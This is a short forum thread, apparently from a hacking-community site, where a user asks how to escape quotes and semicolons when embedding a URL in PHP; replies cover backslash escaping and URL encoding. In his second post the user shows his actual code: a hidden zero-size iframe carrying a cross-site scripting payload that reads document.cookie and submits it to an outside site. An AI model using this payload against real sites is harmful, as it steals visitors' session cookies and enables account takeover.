| Author |
PHP quotes & other things |
unseen
Member
Posts: 21
Location:
Joined: 09.01.05
Rank: Moderate |
|
I'm trying to include a URL in PHP that may have quotes in the url (" and semi-colons (. I get that lame unexpected error, but how the hell do I know where to put the / and \? It might be because I'm trying to code php half asleep, but this has pissed me off for a while. Help anyone? |
|
| Author |
RE: PHP quotes & other things |
wolfmankurd
Member
Posts: 1519
Location: UK
Joined: 30.05.05
Rank: God |
|
You need to post your code( at least the line with the error) and the whole error.
BY READING MY POST, YOU ACCEPT IT AS IS AND AGREE TO MY DISCLAIMER OF ALL WARRANTIES, EXPRESS OR IMPLIED, AS WELL AS DISCLAIMERS OF ALL LIABILITY, DIRECT, INDIRECT, CONSEQUENTIAL OR INCIDENTAL, THAT MAY ARISE FROM THE USE OF THIS (MIS)INFORMATION.
|
 
|
| Author |
RE: PHP quotes & other things |
unseen
Member
Posts: 21
Location:
Joined: 09.01.05
Rank: Moderate |
|
|
<iframe src="http://site.php/something?=</form><form action=http://www.my-site.com/thing.php?blah=document.cookie method=get> <input name=blah> <scblockedript>document.forms[3].blah.value=document.cookie; document.forms[3].submit();</scblockedript></form><input name=submit type=submit>" frameborder="0" width="0" height="0"></iframe>
|
|
|
| Author |
RE: PHP quotes & other things |
Mr_Cheese
HBH Owner
Posts: 2468
Location: Brighton, UK
Joined: 30.11.04
Rank: God |
|
try, converting the special characters to ASCI values.
example:
a space = %20
etc etc
|
|
|
| Author |
RE: PHP quotes & other things |
BobbyB
Member
Posts: 260
Location: England
Joined: 16.03.05
Rank: Monster |
|
if you don't want PHP to parse the special characters, stick a backslash in front of them, e.g.
echo "<form action = \"Something.php\">";
would actually echo
<form action = "Something.php">
Hope that clears it up for ya.
|
|
|
| Author |
RE: PHP quotes & other things |
god
Member
Posts: 349
Location: I bet you're too scared to look behind you..
Joined: 23.01.05
Rank: God |
|
yeh that also works a lil for protecting login scblockedripts..
|
 
|
| Author |
RE: PHP quotes & other things |
unseen
Member
Posts: 21
Location:
Joined: 09.01.05
Rank: Moderate |
|
Thanks a lot, guys!
Just one question. I have a PHP scblockedript trying to echo the HTML code, but it outputs it as plaintext on the page. Why is that? And is there any way to make it so it echos the html code and parses it? |
|
|
| Author |
RE: PHP quotes & other things |
wolfmankurd
Member
Posts: 1519
Location: UK
Joined: 30.05.05
Rank: God |
|
|
even easier is
echo "html using ' instead"
BY READING MY POST, YOU ACCEPT IT AS IS AND AGREE TO MY DISCLAIMER OF ALL WARRANTIES, EXPRESS OR IMPLIED, AS WELL AS DISCLAIMERS OF ALL LIABILITY, DIRECT, INDIRECT, CONSEQUENTIAL OR INCIDENTAL, THAT MAY ARISE FROM THE USE OF THIS (MIS)INFORMATION.
|
|
|
| Author |
RE: PHP quotes & other things |
unseen
Member
Posts: 21
Location:
Joined: 09.01.05
Rank: Moderate |
|
What?
edit: apparently, somehow, the header got set to text/css so it wouldnt output the correct things.
Edited by unseen on 05-02-06 08:01 |
|
|
Main:
